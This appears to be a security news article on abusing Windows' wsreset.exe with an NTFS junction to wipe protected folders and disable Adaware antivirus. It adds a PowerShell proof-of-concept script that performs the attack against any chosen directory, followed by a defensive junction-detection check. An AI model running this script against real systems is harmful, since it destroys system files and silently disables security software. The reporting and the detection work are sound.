A new technique abuses the Windows 10 Microsoft Store troubleshooting tool wsreset.exe to bypass antivirus protection on a host without being detected.
Wsreset.exe is a legitimate troubleshooting tool that lets users diagnose problems with the Windows Store and reset its cache.
Pentester and researcher Daniel Gebert discovered that wsreset.exe can be abused to delete the contents of an arbitrary directory.
Delete files using wsreset.exe
When creating temporary cache files and cookies, the Windows Store stores them in the following directories:
After analyzing the utility, Gebert found that wsreset.exe deletes the files in these folders, which is how it resets the Store application's cache and cookies.
The technique relies on a simple concept: NTFS directory junctions, which behave much like symbolic links.
If an attacker can create a junction that redirects the \INetCookies path to a target directory of their choice, that target directory is what gets emptied when wsreset.exe runs. This works because wsreset.exe runs with elevated (high-integrity) privileges by default.
To begin, the attacker first deletes the \INetCookies folder (which wsreset.exe would otherwise have cleaned out). Unprivileged users can delete this folder, so this is not a hurdle: either an attacker controlling a standard user account or a malicious script running in that user's context can do it.
Next, the attacker creates a directory junction so that \INetCookies points to a privileged location that they would like wsreset.exe to delete.
In the example below, the attacker maps \INetCookies to C:\Windows\System32\drivers\etc. The \etc folder contains important configuration files, including the hosts file, which defines local name-resolution overrides.
"This can be done using mklink.exe with the '/J' parameter or via PowerShell's New-Item command with the '-ItemType' parameter," Gebert explains in his blog post.
Now, when wsreset.exe is run by the attacker or their script, the contents of the \etc folder, which would normally require elevated rights to delete, are removed.
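The procedure above as an added PowerShell example; this is not Gebert's code and not from the article. It reproduces the three steps (delete \INetCookies, recreate it as a junction, run wsreset.exe) against a target directory you choose, defaulting to a throwaway folder under %TEMP% with a canary file so you can confirm the effect without wiping anything real. The Store package path under %LOCALAPPDATA%\Packages is an assumption of this example; the article names only the \INetCookies folder.

```powershell
# Added example, not Daniel Gebert's code: reproduces the junction trick from
# the article against a directory of your choice.
# Assumption: the Store keeps INetCookies under the standard package path below;
# the article refers to it only as "\INetCookies".
param(
    # Directory whose contents wsreset.exe should wipe. The default is a
    # throwaway folder so the script is safe to run; the article's targets
    # were C:\Windows\System32\drivers\etc and
    # 'C:\ProgramData\adaware\adaware antivirus'.
    [string]$Target = (Join-Path $env:TEMP 'wsreset-junction-test')
)

$storeAc = Join-Path $env:LOCALAPPDATA 'Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\AC'
$cookies = Join-Path $storeAc 'INetCookies'
$wsreset = Join-Path $env:SystemRoot 'System32\wsreset.exe'

if (-not (Test-Path -LiteralPath $storeAc)) { throw "Store package folder not found: $storeAc" }

# Test-only setup: when using the default target, create it with a canary
# file so the effect of wsreset.exe is visible.
if ($Target -eq (Join-Path $env:TEMP 'wsreset-junction-test')) {
    New-Item -ItemType Directory -Path $Target -Force | Out-Null
    Set-Content -LiteralPath (Join-Path $Target 'canary.txt') -Value 'delete me'
}

# Step 1: remove the real INetCookies folder. It lives under the user's
# profile, so a standard user can do this. If a junction is already there
# (leftover from an earlier run), drop only the link: Remove-Item -Recurse
# on a junction would otherwise delete the contents of its target.
if (Test-Path -LiteralPath $cookies) {
    $item = Get-Item -LiteralPath $cookies -Force
    if ($item.Attributes -band [System.IO.FileAttributes]::ReparsePoint) {
        [System.IO.Directory]::Delete($cookies)
    } else {
        Remove-Item -LiteralPath $cookies -Recurse -Force
    }
}

# Step 2: recreate INetCookies as a junction to the target
# (equivalent to: mklink /J "<cookies>" "<target>").
New-Item -ItemType Junction -Path $cookies -Target $Target | Out-Null

# Step 3: run wsreset.exe and wait for it. It elevates itself, so no
# -Verb RunAs is needed from a standard user session.
$before = @(Get-ChildItem -LiteralPath $Target -Force -ErrorAction SilentlyContinue).Count
Start-Process -FilePath $wsreset -Wait
$after = @(Get-ChildItem -LiteralPath $Target -Force -ErrorAction SilentlyContinue).Count

# Step 4: report. Files the target application holds open may survive,
# as the article notes for the antivirus case.
"Entries in ${Target}: before=$before, after=$after"

# Step 5: remove the junction itself (not the target) so the Store gets a
# plain INetCookies folder back on next use. Directory.Delete on a reparse
# point deletes only the link.
if (Test-Path -LiteralPath $cookies) {
    [System.IO.Directory]::Delete($cookies)
}
```

Run it as a standard user. Passing -Target 'C:\Windows\System32\drivers\etc' reproduces the article's example and empties a system folder, so do that only on a disposable VM.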
Abuse of wsreset to bypass antivirus
The researcher demonstrated how this behavior can be used to bypass antivirus software, using Adaware as the example.
Adaware antivirus stores its configuration files (among other things) in the C:\ProgramData\adaware\adaware antivirus folder, and it needs these files to work with the malware signatures it has already downloaded. "Normal users cannot delete this folder," Gebert notes.
Once the attacker makes \INetCookies a junction pointing to the \adaware antivirus folder and runs wsreset.exe, the files inside that folder are silently deleted.
Some files that the antivirus had open may remain in the folder even after wsreset.exe runs, but that does not matter: deleting the rest is enough to break the antivirus.
Once the antivirus restarts, it stays permanently disabled, because its settings and other key files were wiped by the system itself, and it could neither detect nor prevent the deletion.
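A defender-side check, added here and not part of the article: it lists directory junctions and symbolic links directly inside the Store package's AC folder whose target lies outside the package, which is exactly the state the technique leaves behind. The package path and the function name Get-SuspiciousStoreJunction are assumptions of this example.

```powershell
# Added defensive check, not from the article: report junctions or symlinks
# inside the Store package's AC folder that point outside the package.
# That is the state the wsreset.exe technique leaves behind.
# Assumptions: standard Store package path; the function name is this example's.
function Get-SuspiciousStoreJunction {
    param(
        [string]$PackageRoot = (Join-Path $env:LOCALAPPDATA 'Packages\Microsoft.WindowsStore_8wekyb3d8bbwe')
    )
    $ac = Join-Path $PackageRoot 'AC'
    if (-not (Test-Path -LiteralPath $ac)) { return }

    # One level only: the technique replaces AC\INetCookies (or a sibling)
    # directly, and not recursing avoids following a junction into its target.
    Get-ChildItem -LiteralPath $ac -Force -Attributes 'Directory+ReparsePoint' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $link   = $_
            $target = @($link.Target)[0]   # PowerShell exposes the link target as .Target
            if ($target -and -not $target.StartsWith($PackageRoot, [System.StringComparison]::OrdinalIgnoreCase)) {
                [pscustomobject]@{
                    Link     = $link.FullName
                    LinkType = $link.LinkType
                    Target   = $target
                }
            }
        }
}

# Usage: run as the user whose profile you are auditing (the package lives
# under that user's %LOCALAPPDATA%). No output means no out-of-package links.
Get-SuspiciousStoreJunction | Format-Table -AutoSize
```

Pair this with alerting on wsreset.exe launches from non-administrative sessions; the junction is what makes the run dangerous, and it is only visible on disk until the attacker removes it.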
This privilege escalation flaw in wsreset.exe can be used for other purposes as well, such as UAC bypass, as demonstrated by Hashim Jawad in 2019.